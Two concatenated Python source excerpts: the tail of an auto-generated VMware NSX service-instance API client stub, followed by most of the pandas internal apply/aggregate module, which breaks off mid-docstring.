get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/serviceinsertion/services/{service-id}/service-instances/{service-instance-id}',
path_variables={
'service_id': 'service-id',
'service_instance_id': 'service-instance-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for list operation
list_input_type = type.StructType('operation-input', {
'service_id': type.StringType(),
})
list_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
HasFieldsOfValidator()
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/serviceinsertion/services/{service-id}/service-instances',
path_variables={
'service_id': 'service-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'service_id': type.StringType(),
'service_instance_id': type.StringType(),
'base_service_instance': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseServiceInstance')]),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
HasFieldsOfValidator()
]
update_output_validator_list = [
HasFieldsOfValidator()
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/serviceinsertion/services/{service-id}/service-instances/{service-instance-id}',
request_body_parameter='base_service_instance',
path_variables={
'service_id': 'service-id',
'service_instance_id': 'service-instance-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseServiceInstance')]),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseServiceInstance')]),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'list': {
'input_type': list_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ServiceInstanceListResult'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': list_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.DynamicStructType('vmware.vapi.dynamic_struct', {}, VapiStruct, [type.ReferenceType('com.vmware.nsx.model_client', 'BaseServiceInstance')]),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'list': list_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.serviceinsertion.services.service_instances',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class StubFactory(StubFactoryBase):
_attrs = {
'ServiceInstances': ServiceInstances,
'service_instances': 'com.vmware.nsx.serviceinsertion.services.service_instances_client.StubFactory',
}
|
py | b41110f3824c27b45651015e1e402b05c9f1322d | from __future__ import annotations
import abc
from collections import defaultdict
from functools import partial
import inspect
import re
from typing import (
TYPE_CHECKING,
Any,
Callable,
DefaultDict,
Dict,
Hashable,
Iterable,
Iterator,
List,
Sequence,
cast,
)
import warnings
import numpy as np
from pandas._config import option_context
from pandas._libs import lib
from pandas._typing import (
AggFuncType,
AggFuncTypeBase,
AggFuncTypeDict,
AggObjType,
Axis,
NDFrameT,
)
from pandas.util._decorators import cache_readonly
from pandas.util._exceptions import find_stack_level
from pandas.core.dtypes.cast import is_nested_object
from pandas.core.dtypes.common import (
is_dict_like,
is_extension_array_dtype,
is_list_like,
is_sequence,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCNDFrame,
ABCSeries,
)
from pandas.core.algorithms import safe_sort
from pandas.core.base import (
DataError,
SelectionMixin,
SpecificationError,
)
import pandas.core.common as com
from pandas.core.construction import (
array as pd_array,
create_series_with_explicit_dtype,
ensure_wrapped_if_datetimelike,
)
if TYPE_CHECKING:
from pandas import (
DataFrame,
Index,
Series,
)
from pandas.core.groupby import GroupBy
from pandas.core.resample import Resampler
from pandas.core.window.rolling import BaseWindow
ResType = Dict[int, Any]
def frame_apply(
obj: DataFrame,
func: AggFuncType,
axis: Axis = 0,
raw: bool = False,
result_type: str | None = None,
args=None,
kwargs=None,
) -> FrameApply:
"""construct and return a row or column based frame apply object"""
axis = obj._get_axis_number(axis)
klass: type[FrameApply]
if axis == 0:
klass = FrameRowApply
elif axis == 1:
klass = FrameColumnApply
return klass(
obj,
func,
raw=raw,
result_type=result_type,
args=args,
kwargs=kwargs,
)
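# Note: ``frame_apply`` is internal plumbing; a call such as ``df.apply(np.sqrt)``
# roughly reduces to the following sketch (simplified, keyword defaults omitted):
#
#     op = frame_apply(df, func=np.sqrt, axis=0)
#     result = op.apply()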
class Apply(metaclass=abc.ABCMeta):
axis: int
def __init__(
self,
obj: AggObjType,
func,
raw: bool,
result_type: str | None,
args,
kwargs,
):
self.obj = obj
self.raw = raw
self.args = args or ()
self.kwargs = kwargs or {}
if result_type not in [None, "reduce", "broadcast", "expand"]:
raise ValueError(
"invalid value for result_type, must be one "
"of {None, 'reduce', 'broadcast', 'expand'}"
)
self.result_type = result_type
# curry if needed
if (
(kwargs or args)
and not isinstance(func, (np.ufunc, str))
and not is_list_like(func)
):
def f(x):
return func(x, *args, **kwargs)
else:
f = func
self.orig_f: AggFuncType = func
self.f: AggFuncType = f
@abc.abstractmethod
def apply(self) -> DataFrame | Series:
pass
def agg(self) -> DataFrame | Series | None:
"""
Provide an implementation for the aggregators.
Returns
-------
Result of aggregation, or None if agg cannot be performed by
this method.
"""
obj = self.obj
arg = self.f
args = self.args
kwargs = self.kwargs
if isinstance(arg, str):
return self.apply_str()
if is_dict_like(arg):
return self.agg_dict_like()
elif is_list_like(arg):
# we require a list, but not a 'str'
return self.agg_list_like()
if callable(arg):
f = com.get_cython_func(arg)
if f and not args and not kwargs:
return getattr(obj, f)()
# caller can react
return None
def transform(self) -> DataFrame | Series:
"""
Transform a DataFrame or Series.
Returns
-------
DataFrame or Series
Result of applying ``func`` along the given axis of the
Series or DataFrame.
Raises
------
ValueError
If the transform function fails or does not transform.
"""
obj = self.obj
func = self.orig_f
axis = self.axis
args = self.args
kwargs = self.kwargs
is_series = obj.ndim == 1
if obj._get_axis_number(axis) == 1:
assert not is_series
return obj.T.transform(func, 0, *args, **kwargs).T
if is_list_like(func) and not is_dict_like(func):
func = cast(List[AggFuncTypeBase], func)
# Convert func equivalent dict
if is_series:
func = {com.get_callable_name(v) or v: v for v in func}
else:
func = {col: func for col in obj}
if is_dict_like(func):
func = cast(AggFuncTypeDict, func)
return self.transform_dict_like(func)
# func is either str or callable
func = cast(AggFuncTypeBase, func)
try:
result = self.transform_str_or_callable(func)
except TypeError:
raise
except Exception as err:
raise ValueError("Transform function failed") from err
# Functions that transform may return empty Series/DataFrame
# when the dtype is not appropriate
if (
isinstance(result, (ABCSeries, ABCDataFrame))
and result.empty
and not obj.empty
):
raise ValueError("Transform function failed")
if not isinstance(result, (ABCSeries, ABCDataFrame)) or not result.index.equals(
obj.index
):
raise ValueError("Function did not transform")
return result
def transform_dict_like(self, func):
"""
Compute transform in the case of a dict-like func
"""
from pandas.core.reshape.concat import concat
obj = self.obj
args = self.args
kwargs = self.kwargs
# transform is currently only for Series/DataFrame
assert isinstance(obj, ABCNDFrame)
if len(func) == 0:
raise ValueError("No transform functions were provided")
func = self.normalize_dictlike_arg("transform", obj, func)
results: dict[Hashable, DataFrame | Series] = {}
failed_names = []
all_type_errors = True
for name, how in func.items():
colg = obj._gotitem(name, ndim=1)
try:
results[name] = colg.transform(how, 0, *args, **kwargs)
except Exception as err:
if str(err) in {
"Function did not transform",
"No transform functions were provided",
}:
raise err
else:
if not isinstance(err, TypeError):
all_type_errors = False
failed_names.append(name)
# combine results
if not results:
klass = TypeError if all_type_errors else ValueError
raise klass("Transform function failed")
if len(failed_names) > 0:
warnings.warn(
f"{failed_names} did not transform successfully. If any error is "
f"raised, this will raise in a future version of pandas. "
f"Drop these columns/ops to avoid this warning.",
FutureWarning,
stacklevel=find_stack_level(),
)
return concat(results, axis=1)
def transform_str_or_callable(self, func) -> DataFrame | Series:
"""
Compute transform in the case of a string or callable func
"""
obj = self.obj
args = self.args
kwargs = self.kwargs
if isinstance(func, str):
return self._try_aggregate_string_function(obj, func, *args, **kwargs)
if not args and not kwargs:
f = com.get_cython_func(func)
if f:
return getattr(obj, f)()
# Two possible ways to use a UDF - apply or call directly
try:
return obj.apply(func, args=args, **kwargs)
except Exception:
return func(obj, *args, **kwargs)
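    # Example of the string/callable transform path (illustrative only):
    #   ser.transform("abs")           -> dispatched via _try_aggregate_string_function
    #   ser.transform(lambda x: x + 1) -> after the cython shortcut, tried as
    #                                     obj.apply(func), falling back to func(obj)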
def agg_list_like(self) -> DataFrame | Series:
"""
Compute aggregation in the case of a list-like argument.
Returns
-------
Result of aggregation.
"""
from pandas.core.reshape.concat import concat
obj = self.obj
arg = cast(List[AggFuncTypeBase], self.f)
if not isinstance(obj, SelectionMixin):
# i.e. obj is Series or DataFrame
selected_obj = obj
elif obj._selected_obj.ndim == 1:
# For SeriesGroupBy this matches _obj_with_exclusions
selected_obj = obj._selected_obj
else:
selected_obj = obj._obj_with_exclusions
results = []
keys = []
failed_names = []
depr_nuisance_columns_msg = (
"{} did not aggregate successfully. If any error is "
"raised this will raise in a future version of pandas. "
"Drop these columns/ops to avoid this warning."
)
# degenerate case
if selected_obj.ndim == 1:
for a in arg:
colg = obj._gotitem(selected_obj.name, ndim=1, subset=selected_obj)
try:
new_res = colg.aggregate(a)
except TypeError:
failed_names.append(com.get_callable_name(a) or a)
else:
results.append(new_res)
# make sure we find a good name
name = com.get_callable_name(a) or a
keys.append(name)
# multiples
else:
indices = []
for index, col in enumerate(selected_obj):
colg = obj._gotitem(col, ndim=1, subset=selected_obj.iloc[:, index])
try:
# Capture and suppress any warnings emitted by us in the call
# to agg below, but pass through any warnings that were
# generated otherwise.
# This is necessary because of https://bugs.python.org/issue29672
# See GH #43741 for more details
with warnings.catch_warnings(record=True) as record:
new_res = colg.aggregate(arg)
if len(record) > 0:
match = re.compile(depr_nuisance_columns_msg.format(".*"))
for warning in record:
if re.match(match, str(warning.message)):
failed_names.append(col)
else:
warnings.warn_explicit(
message=warning.message,
category=warning.category,
filename=warning.filename,
lineno=warning.lineno,
)
except (TypeError, DataError):
failed_names.append(col)
except ValueError as err:
# cannot aggregate
if "Must produce aggregated value" in str(err):
# raised directly in _aggregate_named
failed_names.append(col)
elif "no results" in str(err):
# reached in test_frame_apply.test_nuiscance_columns
# where the colg.aggregate(arg) ends up going through
# the selected_obj.ndim == 1 branch above with arg == ["sum"]
# on a datetime64[ns] column
failed_names.append(col)
else:
raise
else:
results.append(new_res)
indices.append(index)
keys = selected_obj.columns.take(indices)
# if we are empty
if not len(results):
raise ValueError("no results")
if len(failed_names) > 0:
warnings.warn(
depr_nuisance_columns_msg.format(failed_names),
FutureWarning,
stacklevel=find_stack_level(),
)
try:
concatenated = concat(results, keys=keys, axis=1, sort=False)
except TypeError as err:
# we are concatting non-NDFrame objects,
# e.g. a list of scalars
from pandas import Series
result = Series(results, index=keys, name=obj.name)
if is_nested_object(result):
raise ValueError(
"cannot combine transform and aggregation operations"
) from err
return result
else:
# Concat uses the first index to determine the final indexing order.
# The union of a shorter first index with the other indices causes
# the index sorting to be different from the order of the aggregating
# functions. Reindex if this is the case.
index_size = concatenated.index.size
full_ordered_index = next(
result.index for result in results if result.index.size == index_size
)
return concatenated.reindex(full_ordered_index, copy=False)
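    # Example of the list-like aggregation path (illustrative values only):
    #   df = DataFrame({"A": [1, 2], "B": [3, 4]})
    #   df.agg(["sum", "mean"])
    #   ->         A    B
    #      sum   3.0  7.0
    #      mean  1.5  3.5
    # Every function is applied to each column and the per-column results are
    # concatenated with the column labels as keys.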
def agg_dict_like(self) -> DataFrame | Series:
"""
Compute aggregation in the case of a dict-like argument.
Returns
-------
Result of aggregation.
"""
from pandas import Index
from pandas.core.reshape.concat import concat
obj = self.obj
arg = cast(AggFuncTypeDict, self.f)
if not isinstance(obj, SelectionMixin):
# i.e. obj is Series or DataFrame
selected_obj = obj
selection = None
else:
selected_obj = obj._selected_obj
selection = obj._selection
arg = self.normalize_dictlike_arg("agg", selected_obj, arg)
if selected_obj.ndim == 1:
# key only used for output
colg = obj._gotitem(selection, ndim=1)
results = {key: colg.agg(how) for key, how in arg.items()}
else:
# key used for column selection and output
results = {
key: obj._gotitem(key, ndim=1).agg(how) for key, how in arg.items()
}
# set the final keys
keys = list(arg.keys())
# Avoid making two isinstance calls in all and any below
is_ndframe = [isinstance(r, ABCNDFrame) for r in results.values()]
# combine results
if all(is_ndframe):
keys_to_use: Iterable[Hashable]
keys_to_use = [k for k in keys if not results[k].empty]
# Have to check, if at least one DataFrame is not empty.
keys_to_use = keys_to_use if keys_to_use != [] else keys
if selected_obj.ndim == 2:
# keys are columns, so we can preserve names
ktu = Index(keys_to_use)
ktu._set_names(selected_obj.columns.names)
keys_to_use = ktu
axis = 0 if isinstance(obj, ABCSeries) else 1
result = concat(
{k: results[k] for k in keys_to_use}, axis=axis, keys=keys_to_use
)
elif any(is_ndframe):
# There is a mix of NDFrames and scalars
raise ValueError(
"cannot perform both aggregation "
"and transformation operations "
"simultaneously"
)
else:
from pandas import Series
# we have a dict of scalars
# GH 36212 use name only if obj is a series
if obj.ndim == 1:
obj = cast("Series", obj)
name = obj.name
else:
name = None
result = Series(results, name=name)
return result
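    # Example of the dict-like aggregation path (illustrative values only):
    #   df.agg({"A": "sum", "B": ["min", "max"]})
    # Keys select columns and values give the function(s) applied to each one;
    # scalar-only results collapse into a Series, while NDFrame results are
    # concatenated (missing column/function combinations become NaN).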
def apply_str(self) -> DataFrame | Series:
"""
Compute apply in case of a string.
Returns
-------
result: Series or DataFrame
"""
# Caller is responsible for checking isinstance(self.f, str)
f = cast(str, self.f)
obj = self.obj
# Support for `frame.transform('method')`
# Some methods (shift, etc.) require the axis argument, others
# don't, so inspect and insert if necessary.
func = getattr(obj, f, None)
if callable(func):
sig = inspect.getfullargspec(func)
if "axis" in sig.args:
self.kwargs["axis"] = self.axis
elif self.axis != 0:
raise ValueError(f"Operation {f} does not support axis=1")
return self._try_aggregate_string_function(obj, f, *self.args, **self.kwargs)
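    # Example of string dispatch (illustrative only):
    #   df.apply("mean")          -> resolved to DataFrame.mean()
    #   df.apply("shift", axis=1) -> the axis keyword is injected because
    #                                DataFrame.shift accepts it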
def apply_multiple(self) -> DataFrame | Series:
"""
Compute apply in case of a list-like or dict-like.
Returns
-------
result: Series, DataFrame, or None
Result when self.f is a list-like or dict-like, None otherwise.
"""
return self.obj.aggregate(self.f, self.axis, *self.args, **self.kwargs)
def normalize_dictlike_arg(
self, how: str, obj: DataFrame | Series, func: AggFuncTypeDict
) -> AggFuncTypeDict:
"""
Handler for dict-like argument.
Ensures that necessary columns exist if obj is a DataFrame, and
that a nested renamer is not passed. Also normalizes to all lists
        when values consist of a mix of lists and non-lists.
"""
assert how in ("apply", "agg", "transform")
# Can't use func.values(); wouldn't work for a Series
if (
how == "agg"
and isinstance(obj, ABCSeries)
and any(is_list_like(v) for _, v in func.items())
) or (any(is_dict_like(v) for _, v in func.items())):
# GH 15931 - deprecation of renaming keys
raise SpecificationError("nested renamer is not supported")
if obj.ndim != 1:
# Check for missing columns on a frame
cols = set(func.keys()) - set(obj.columns)
if len(cols) > 0:
cols_sorted = list(safe_sort(list(cols)))
raise KeyError(f"Column(s) {cols_sorted} do not exist")
is_aggregator = lambda x: isinstance(x, (list, tuple, dict))
# if we have a dict of any non-scalars
# eg. {'A' : ['mean']}, normalize all to
# be list-likes
# Cannot use func.values() because arg may be a Series
if any(is_aggregator(x) for _, x in func.items()):
new_func: AggFuncTypeDict = {}
for k, v in func.items():
if not is_aggregator(v):
# mypy can't realize v is not a list here
new_func[k] = [v] # type:ignore[list-item]
else:
new_func[k] = v
func = new_func
return func
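    # Example of the normalization step (illustrative only): once any value is
    # list-like, every value is wrapped in a list, e.g.
    #   {"A": "min", "B": ["max"]}  ->  {"A": ["min"], "B": ["max"]}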
def _try_aggregate_string_function(self, obj, arg: str, *args, **kwargs):
"""
if arg is a string, then try to operate on it:
- try to find a function (or attribute) on ourselves
- try to find a numpy function
- raise
"""
assert isinstance(arg, str)
f = getattr(obj, arg, None)
if f is not None:
if callable(f):
return f(*args, **kwargs)
# people may try to aggregate on a non-callable attribute
# but don't let them think they can pass args to it
assert len(args) == 0
assert len([kwarg for kwarg in kwargs if kwarg not in ["axis"]]) == 0
return f
f = getattr(np, arg, None)
if f is not None and hasattr(obj, "__array__"):
# in particular exclude Window
return f(obj, *args, **kwargs)
raise AttributeError(
f"'{arg}' is not a valid function for '{type(obj).__name__}' object"
)
class NDFrameApply(Apply):
"""
Methods shared by FrameApply and SeriesApply but
not GroupByApply or ResamplerWindowApply
"""
@property
def index(self) -> Index:
return self.obj.index
@property
def agg_axis(self) -> Index:
return self.obj._get_agg_axis(self.axis)
class FrameApply(NDFrameApply):
obj: DataFrame
# ---------------------------------------------------------------
# Abstract Methods
@property
@abc.abstractmethod
def result_index(self) -> Index:
pass
@property
@abc.abstractmethod
def result_columns(self) -> Index:
pass
@property
@abc.abstractmethod
def series_generator(self) -> Iterator[Series]:
pass
@abc.abstractmethod
def wrap_results_for_axis(
self, results: ResType, res_index: Index
) -> DataFrame | Series:
pass
# ---------------------------------------------------------------
@property
def res_columns(self) -> Index:
return self.result_columns
@property
def columns(self) -> Index:
return self.obj.columns
@cache_readonly
def values(self):
return self.obj.values
@cache_readonly
def dtypes(self) -> Series:
return self.obj.dtypes
def apply(self) -> DataFrame | Series:
"""compute the results"""
# dispatch to agg
if is_list_like(self.f):
return self.apply_multiple()
# all empty
if len(self.columns) == 0 and len(self.index) == 0:
return self.apply_empty_result()
# string dispatch
if isinstance(self.f, str):
return self.apply_str()
# ufunc
elif isinstance(self.f, np.ufunc):
with np.errstate(all="ignore"):
results = self.obj._mgr.apply("apply", func=self.f)
# _constructor will retain self.index and self.columns
return self.obj._constructor(data=results)
# broadcasting
if self.result_type == "broadcast":
return self.apply_broadcast(self.obj)
# one axis empty
elif not all(self.obj.shape):
return self.apply_empty_result()
# raw
elif self.raw:
return self.apply_raw()
return self.apply_standard()
def agg(self):
obj = self.obj
axis = self.axis
# TODO: Avoid having to change state
self.obj = self.obj if self.axis == 0 else self.obj.T
self.axis = 0
result = None
try:
result = super().agg()
except TypeError as err:
exc = TypeError(
"DataFrame constructor called with "
f"incompatible data and dtype: {err}"
)
raise exc from err
finally:
self.obj = obj
self.axis = axis
if axis == 1:
result = result.T if result is not None else result
if result is None:
result = self.obj.apply(self.orig_f, axis, args=self.args, **self.kwargs)
return result
def apply_empty_result(self):
"""
we have an empty result; at least 1 axis is 0
we will try to apply the function to an empty
series in order to see if this is a reduction function
"""
assert callable(self.f)
# we are not asked to reduce or infer reduction
# so just return a copy of the existing object
if self.result_type != "reduce":
return self.obj.copy()
else:
if len(self.agg_axis):
r = self.f(Series([], dtype=np.float64))
else:
r = np.nan
return self.obj._constructor_sliced(r, index=self.agg_axis)
def apply_raw(self):
"""apply to the values as a numpy array"""
def wrap_function(func):
"""
Wrap user supplied function to work around numpy issue.
see https://github.com/numpy/numpy/issues/8352
"""
def wrapper(*args, **kwargs):
result = func(*args, **kwargs)
if isinstance(result, str):
result = np.array(result, dtype=object)
return result
return wrapper
result = np.apply_along_axis(wrap_function(self.f), self.axis, self.values)
# TODO: mixed type case
if result.ndim == 2:
return self.obj._constructor(result, index=self.index, columns=self.columns)
else:
return self.obj._constructor_sliced(result, index=self.agg_axis)
def apply_broadcast(self, target: DataFrame) -> DataFrame:
assert callable(self.f)
result_values = np.empty_like(target.values)
        # number of rows that any 1d result must match to be broadcast back
result_compare = target.shape[0]
for i, col in enumerate(target.columns):
res = self.f(target[col])
ares = np.asarray(res).ndim
# must be a scalar or 1d
if ares > 1:
raise ValueError("too many dims to broadcast")
elif ares == 1:
# must match return dim
if result_compare != len(res):
raise ValueError("cannot broadcast result")
result_values[:, i] = res
# we *always* preserve the original index / columns
result = self.obj._constructor(
result_values, index=target.index, columns=target.columns
)
return result
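    # Example of result_type="broadcast" (illustrative values only):
    #   df = DataFrame({"A": [1, 2], "B": [3, 4]})
    #   df.apply(lambda col: col.sum(), result_type="broadcast")
    #   ->    A  B
    #      0  3  7
    #      1  3  7
    # Scalar or length-matching 1d results are written back over the original
    # shape, always preserving the original index and columns.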
def apply_standard(self):
results, res_index = self.apply_series_generator()
# wrap results
return self.wrap_results(results, res_index)
def apply_series_generator(self) -> tuple[ResType, Index]:
assert callable(self.f)
series_gen = self.series_generator
res_index = self.result_index
results = {}
with option_context("mode.chained_assignment", None):
for i, v in enumerate(series_gen):
# ignore SettingWithCopy here in case the user mutates
results[i] = self.f(v)
if isinstance(results[i], ABCSeries):
# If we have a view on v, we need to make a copy because
# series_generator will swap out the underlying data
results[i] = results[i].copy(deep=False)
return results, res_index
def wrap_results(self, results: ResType, res_index: Index) -> DataFrame | Series:
from pandas import Series
# see if we can infer the results
if len(results) > 0 and 0 in results and is_sequence(results[0]):
return self.wrap_results_for_axis(results, res_index)
# dict of scalars
# the default dtype of an empty Series will be `object`, but this
# code can be hit by df.mean() where the result should have dtype
# float64 even if it's an empty Series.
constructor_sliced = self.obj._constructor_sliced
if constructor_sliced is Series:
result = create_series_with_explicit_dtype(
results, dtype_if_empty=np.float64
)
else:
result = constructor_sliced(results)
result.index = res_index
return result
def apply_str(self) -> DataFrame | Series:
# Caller is responsible for checking isinstance(self.f, str)
# TODO: GH#39993 - Avoid special-casing by replacing with lambda
if self.f == "size":
# Special-cased because DataFrame.size returns a single scalar
obj = self.obj
value = obj.shape[self.axis]
return obj._constructor_sliced(value, index=self.agg_axis)
return super().apply_str()
class FrameRowApply(FrameApply):
axis = 0
def apply_broadcast(self, target: DataFrame) -> DataFrame:
return super().apply_broadcast(target)
@property
def series_generator(self):
return (self.obj._ixs(i, axis=1) for i in range(len(self.columns)))
@property
def result_index(self) -> Index:
return self.columns
@property
def result_columns(self) -> Index:
return self.index
def wrap_results_for_axis(
self, results: ResType, res_index: Index
) -> DataFrame | Series:
"""return the results for the rows"""
if self.result_type == "reduce":
# e.g. test_apply_dict GH#8735
res = self.obj._constructor_sliced(results)
res.index = res_index
return res
elif self.result_type is None and all(
isinstance(x, dict) for x in results.values()
):
# Our operation was a to_dict op e.g.
# test_apply_dict GH#8735, test_apply_reduce_to_dict GH#25196 #37544
res = self.obj._constructor_sliced(results)
res.index = res_index
return res
try:
result = self.obj._constructor(data=results)
except ValueError as err:
if "All arrays must be of the same length" in str(err):
# e.g. result = [[2, 3], [1.5], ['foo', 'bar']]
# see test_agg_listlike_result GH#29587
res = self.obj._constructor_sliced(results)
res.index = res_index
return res
else:
raise
if not isinstance(results[0], ABCSeries):
if len(result.index) == len(self.res_columns):
result.index = self.res_columns
if len(result.columns) == len(res_index):
result.columns = res_index
return result
class FrameColumnApply(FrameApply):
axis = 1
def apply_broadcast(self, target: DataFrame) -> DataFrame:
result = super().apply_broadcast(target.T)
return result.T
@property
def series_generator(self):
values = self.values
values = ensure_wrapped_if_datetimelike(values)
assert len(values) > 0
# We create one Series object, and will swap out the data inside
# of it. Kids: don't do this at home.
ser = self.obj._ixs(0, axis=0)
mgr = ser._mgr
if is_extension_array_dtype(ser.dtype):
# values will be incorrect for this block
# TODO(EA2D): special case would be unnecessary with 2D EAs
obj = self.obj
for i in range(len(obj)):
yield obj._ixs(i, axis=0)
else:
for (arr, name) in zip(values, self.index):
# GH#35462 re-pin mgr in case setitem changed it
ser._mgr = mgr
mgr.set_values(arr)
ser.name = name
yield ser
@property
def result_index(self) -> Index:
return self.index
@property
def result_columns(self) -> Index:
return self.columns
def wrap_results_for_axis(
self, results: ResType, res_index: Index
) -> DataFrame | Series:
"""return the results for the columns"""
result: DataFrame | Series
# we have requested to expand
if self.result_type == "expand":
result = self.infer_to_same_shape(results, res_index)
# we have a non-series and don't want inference
elif not isinstance(results[0], ABCSeries):
result = self.obj._constructor_sliced(results)
result.index = res_index
# we may want to infer results
else:
result = self.infer_to_same_shape(results, res_index)
return result
def infer_to_same_shape(self, results: ResType, res_index: Index) -> DataFrame:
"""infer the results to the same shape as the input object"""
result = self.obj._constructor(data=results)
result = result.T
# set the index
result.index = res_index
# infer dtypes
result = result.infer_objects()
return result
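    # Example of result_type="expand" along axis=1 (illustrative values only):
    #   df.apply(lambda row: [row.min(), row.max()], axis=1, result_type="expand")
    # Each returned list-like becomes a row of a new frame that is reindexed to
    # the original row index, with positional column labels.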
class SeriesApply(NDFrameApply):
obj: Series
axis = 0
def __init__(
self,
obj: Series,
func: AggFuncType,
convert_dtype: bool,
args,
kwargs,
):
self.convert_dtype = convert_dtype
super().__init__(
obj,
func,
raw=False,
result_type=None,
args=args,
kwargs=kwargs,
)
def apply(self) -> DataFrame | Series:
obj = self.obj
if len(obj) == 0:
return self.apply_empty_result()
# dispatch to agg
if is_list_like(self.f):
return self.apply_multiple()
if isinstance(self.f, str):
# if we are a string, try to dispatch
return self.apply_str()
return self.apply_standard()
def agg(self):
result = super().agg()
if result is None:
f = self.f
kwargs = self.kwargs
# string, list-like, and dict-like are entirely handled in super
assert callable(f)
# we can be called from an inner function which
# passes this meta-data
kwargs.pop("_level", None)
# try a regular apply, this evaluates lambdas
            # row-by-row; however, if the lambda expects a Series
# expression, e.g.: lambda x: x-x.quantile(0.25)
# this will fail, so we can try a vectorized evaluation
# we cannot FIRST try the vectorized evaluation, because
# then .agg and .apply would have different semantics if the
# operation is actually defined on the Series, e.g. str
try:
result = self.obj.apply(f)
except (ValueError, AttributeError, TypeError):
result = f(self.obj)
return result
def apply_empty_result(self) -> Series:
obj = self.obj
return obj._constructor(dtype=obj.dtype, index=obj.index).__finalize__(
obj, method="apply"
)
def apply_standard(self) -> DataFrame | Series:
f = self.f
obj = self.obj
with np.errstate(all="ignore"):
if isinstance(f, np.ufunc):
return f(obj)
# row-wise access
if is_extension_array_dtype(obj.dtype) and hasattr(obj._values, "map"):
# GH#23179 some EAs do not have `map`
mapped = obj._values.map(f)
else:
values = obj.astype(object)._values
# error: Argument 2 to "map_infer" has incompatible type
# "Union[Callable[..., Any], str, List[Union[Callable[..., Any], str]],
# Dict[Hashable, Union[Union[Callable[..., Any], str],
# List[Union[Callable[..., Any], str]]]]]"; expected
# "Callable[[Any], Any]"
mapped = lib.map_infer(
values,
f, # type: ignore[arg-type]
convert=self.convert_dtype,
)
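        # Example of this element-wise path (illustrative values only):
        #   Series(["a", "bb"]).apply(len) -> Series([1, 2]); if each element
        #   maps to a Series instead, the result is expanded to a DataFrame below.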
if len(mapped) and isinstance(mapped[0], ABCSeries):
# GH 25959 use pd.array instead of tolist
# so extension arrays can be used
return obj._constructor_expanddim(pd_array(mapped), index=obj.index)
else:
return obj._constructor(mapped, index=obj.index).__finalize__(
obj, method="apply"
)
class GroupByApply(Apply):
def __init__(
self,
obj: GroupBy[NDFrameT],
func: AggFuncType,
args,
kwargs,
):
kwargs = kwargs.copy()
self.axis = obj.obj._get_axis_number(kwargs.get("axis", 0))
super().__init__(
obj,
func,
raw=False,
result_type=None,
args=args,
kwargs=kwargs,
)
def apply(self):
raise NotImplementedError
def transform(self):
raise NotImplementedError
class ResamplerWindowApply(Apply):
axis = 0
obj: Resampler | BaseWindow
def __init__(
self,
obj: Resampler | BaseWindow,
func: AggFuncType,
args,
kwargs,
):
super().__init__(
obj,
func,
raw=False,
result_type=None,
args=args,
kwargs=kwargs,
)
def apply(self):
raise NotImplementedError
def transform(self):
raise NotImplementedError
def reconstruct_func(
func: AggFuncType | None, **kwargs
) -> tuple[bool, AggFuncType | None, list[str] | None, list[int] | None]:
"""
This is the internal function to reconstruct func given if there is relabeling
or not and also normalize the keyword to get new order of columns.
If named aggregation is applied, `func` will be None, and kwargs contains the
column and aggregation function information to be parsed;
If named aggregation is not applied, `func` is either string (e.g. 'min') or
Callable, or list of them (e.g. ['min', np.max]), or the dictionary of column name
